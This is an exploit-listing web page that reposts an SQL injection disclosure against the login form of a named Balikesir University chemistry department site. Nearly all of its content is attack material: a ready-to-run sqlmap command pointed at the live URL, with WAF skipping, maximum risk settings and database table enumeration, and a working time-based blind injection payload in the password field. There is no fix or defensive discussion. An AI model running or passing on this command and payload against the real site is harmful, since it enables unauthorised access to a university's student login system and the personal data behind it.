Advertisement






Balikesir University SQL Injection Vulnerablity

CVE Category Price Severity
N/A CWE-89 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-06-25
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060061

Below is a copy:

Balikesir University SQL Injection Vulnerablity
======================================================================================|
| # Title : Balikesir University SQL Injection Vulnerability |
| # Author : Xale |
| # Tested on : Kali Linux |
======================================================================================|

sqlmap payload :  sqlmap -u "https://kimya.balikesir.edu.tr/KimyaBolumuNew/indexogr.php" --forms --skip-waf --risk=3 --level=5 --threads=7 --no-cast -D KimyaBolumu --tables

---
Parameter: Parola (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: TCKimlik=JqOY&Parola=' AND (SELECT 4080 FROM (SELECT(SLEEP(5)))WRtb) AND 'VNiD'='VNiD&GirisSekli=Ogrenci&giris=TAMAM
---


:=========================================================================================================================

=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.